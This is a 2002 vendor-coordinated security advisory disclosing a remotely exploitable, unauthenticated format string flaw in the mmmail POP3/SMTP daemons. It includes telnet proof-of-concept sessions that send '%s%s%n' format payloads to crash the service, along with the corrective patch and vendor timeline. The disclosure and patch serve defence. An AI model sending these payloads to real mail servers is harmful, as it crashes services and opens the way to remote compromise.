[CERT-intexxia] mmmail POP3-SMTP Daemon Format String Vulnerability

Benoīt Roussel <benoit.roussel@intexxia.com> · Wed, 12 Jun 2002 14:49:49 +0200




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
SECURITY ADVISORY                                            INTEXXIA(c)
04 06 2002                                               ID #1054-040602
________________________________________________________________________
TITLE   : mmmail POP3-SMTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________


SYSTEM AFFECTED
===============

        mmmail <= 0.0.13 (mmpop3d & mmsmtpd)


________________________________________________________________________


DESCRIPTION
===========

        "mmmail provides  SMTP and  POP3 daemons using MySQL, running as
a  non-root  user.  It  also supports bandwidth shaping. Relaying is not
supported, although  it has  been designed  to handle many users on many
virtual hosts. It is fast and secure, uses threads, and has been written
entirely from scratch and does not rely on mbox or Maildir formats."

        mmmail  includes  2  daemons,  mmpop3d  and  mmsmtpd.  Both  are
vulnerable to a remotely exploitable format string issue.


________________________________________________________________________


DETAILS
=======

        There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function of  the 'mmpop3d'  and 'mmsmtpd'  programs. This  function acts
like 'vsyslog()' if '__GLIBC__' is  defined.  It  calls  the 'syslog(3)'
function with  a format  string that can be defined by a remote user. It
is not necessary to authenticate to exploit this vulnerability.

Successful exploitation of this  flaw can  allow a remote user to obtain
a local account on the target machine.


________________________________________________________________________


PROOF OF CONCEPT
================

mmpop3d
- -------

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
- -ERR Invalid username

In the log file :
mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


mmsmtpd
- -------
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname

In the log file :
mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


________________________________________________________________________


SOLUTION
========

The following patch corrects this issue :

iff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun  4 12:37:19 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
     }
 }

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz


________________________________________________________________________


VENDOR STATUS
=============

        04-06-2002 : This bulletin was sent to Matthew Mondor.
        05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
                     vulnerability. He released a new version.


________________________________________________________________________


LEGALS
======

        mmmail is a registered trademark.


        Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


        (c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.


________________________________________________________________________


CONTACT
=======

CERT intexxia                                          cert@intexxia.com
INTEXXIA                                         http://www.intexxia.com
171, av. Georges Clemenceau                 Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France                    Fax : +33 1 55 69 78 80

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPQdDak2N8BNyNDXLEQLHOQCgxlI4n/uFPTw4oZmjUVXTUhV8j7QAoLzr
wM33noZDTKjFJE8HNkSdphPm
=6uvy
-----END PGP SIGNATURE-----







